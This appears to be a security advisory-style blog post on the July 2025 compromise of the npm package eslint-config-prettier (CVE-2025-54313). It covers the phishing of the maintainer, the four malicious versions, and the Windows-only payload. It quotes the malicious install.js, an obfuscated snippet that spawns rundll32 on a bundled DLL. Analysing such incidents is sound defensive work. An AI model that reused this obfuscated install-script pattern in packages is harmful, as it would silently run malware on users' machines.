Malicious npm Supply Chain Attack: Deep Technical Dive into CVE-2025-54313 in eslint-config-prettier

When trusted open-source tools become attack vectors, the consequences ripple across the global software supply chain. The recent compromise of eslint-config-prettier—a package with over 30 million weekly downloads—demonstrates just how quickly a single phishing email can cascade into widespread malware infections. Security teams and developers alike must understand the technical intricacies of CVE-2025-54313 to defend their environments and restore trust in their toolchains.

Introduction

The JavaScript ecosystem relies heavily on npm packages for code linting and formatting. eslint-config-prettier is a cornerstone of this ecosystem, bridging Prettier and ESLint to enforce consistent code style across millions of projects. In July 2025, attackers exploited this trust by compromising the package's maintainer credentials, injecting malware into four widely-used versions. The attack targeted Windows developers, leveraging npm's post-install scripts to execute a malicious DLL. This incident is a stark reminder of the fragility of open-source supply chains and the need for robust security practices at every layer.

About the Parties Involved

eslint-config-prettier is a configuration package that disables formatting rules in ESLint that might conflict with Prettier, ensuring seamless integration between the two tools. Maintained by JounQin, it is a critical dependency for countless JavaScript and TypeScript projects. With tens of millions of weekly downloads, its compromise has far-reaching implications for the global software industry, affecting both individual developers and large enterprises.

Technical Information

The attack began with a targeted phishing campaign. The maintainer of eslint-config-prettier received a convincing email purporting to be from npm support, referencing a real support ticket and containing legitimate npm links. However, the login link pointed to a typosquatted domain (npnjs.com), where the maintainer's credentials and npm token were harvested (stepsecurity.io, bleepingcomputer.com).

Armed with the stolen token, attackers published four malicious versions of eslint-config-prettier (8.10.1, 9.1.1, 10.1.6, 10.1.7) directly to the npm registry. These versions introduced an install.js script in the package root. The script contained obfuscated logic to evade casual inspection:

if (os.platform() === 'win32') {
  require('chi' + 'ld_pro' + 'cess')['sp' + 'awn']('rund' + 'll32', [ path.join(__dirname, './node-gyp.dll') + ',main'
  ]);
}

This code checks if the installation is occurring on a Windows system. If so, it spawns a new process using rundll32 to execute the bundled node-gyp.dll file. The DLL is a Windows malware payload; initial analysis suggests it performs reconnaissance and may establish persistence or exfiltrate data (github.com/prettier/eslint-config-prettier/issues/339, whitehat.eu).

The attack was limited to Windows environments due to the explicit platform check. Linux and macOS users were unaffected. The malicious versions were quickly flagged by the community when automated tools (like RenovateBot) noticed discrepancies between npm and GitHub releases, and when the presence of unexpected install scripts was detected (stepsecurity.io).

The malware's execution chain relies on npm's post-install lifecycle, which runs scripts defined in the package after installation. This mechanism, while useful for legitimate build steps, is a well-known attack surface for supply chain threats. The obfuscated code further delayed detection, as it bypassed simple string-matching heuristics.

Affected Systems and Versions

The following versions of eslint-config-prettier are confirmed to be malicious:

• 8.10.1
• 9.1.1
• 10.1.6
• 10.1.7

Only Windows systems are affected, as the install script checks for the win32 platform. Projects using version ranges (e.g., ^10.1.0) or automated dependency updates (e.g., Dependabot, RenovateBot) may have inadvertently installed these versions. The attack also impacted related packages maintained by the same author, including eslint-plugin-prettier (4.2.2, 4.2.3) and synckit (0.11.9), but the primary focus of this CVE is eslint-config-prettier (npmjs.com).

Vendor Security History

JounQin, the maintainer, is responsible for several high-profile npm packages. While there is no public record of previous security incidents involving eslint-config-prettier, the npm ecosystem has experienced multiple supply chain attacks in recent years. Notably, the event highlights ongoing challenges with maintainer account security and the need for ecosystem-wide enforcement of multi-factor authentication. The maintainer acted swiftly to revoke compromised credentials and coordinate with npm to deprecate malicious versions, but the incident reveals systemic weaknesses in npm's security posture (bleepingcomputer.com).

References

• NVD entry for CVE-2025-54313
• Official CVE entry (MITRE)
• GitHub issue: prettier/eslint-config-prettier#339
• Hacker News thread #1
• Hacker News thread #2
• Socket.dev blog analysis
• BleepingComputer coverage
• npm package versions
• StepSecurity analysis

---

This post is based strictly on technical details and public advisories as of July 19, 2025. Security teams are encouraged to review all references for the latest updates and forensic guidance.

Source: This report was created using AI

If you have suggestions for improvement or feedback, please reach out to us at [email protected]